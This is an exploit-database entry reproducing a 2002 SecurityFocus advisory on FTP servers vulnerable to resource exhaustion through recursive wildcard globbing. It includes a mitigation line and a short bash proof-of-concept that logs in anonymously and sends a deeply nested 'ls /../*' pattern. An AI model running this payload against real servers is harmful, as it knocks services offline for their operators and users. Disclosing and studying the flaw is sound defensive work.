header-logo
Suggest Exploit
vendor:
N/A
by:
SecurityFocus
8.3
CVSS
HIGH
Denial of Service
400
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Denial of Service Vulnerability in FTP Servers

Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits. Globbing generates pathnames from file name patterns used by the shell, eg. wildcards denoted by * and ?, multiple choices denoted by {}, etc. The vulnerable FTP servers can be exploited to exhaust system resources if per-user resource usage controls have not been implemented.

Mitigation:

Implement per-user resource usage controls.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/2496/info

Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits.

Globbing generates pathnames from file name patterns used by the shell, eg. wildcards denoted by * and ?, multiple choices denoted by {}, etc.

The vulnerable FTP servers can be exploited to exhaust system resources if per-user resource usage controls have not been implemented. 

#!/bin/bash=20
ftp -n FTP-SERVER<<\end=20
quot user anonymous
bin
quot pass shitold@bug.com
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20

Navigation

Suggest Exploit

Services By CQR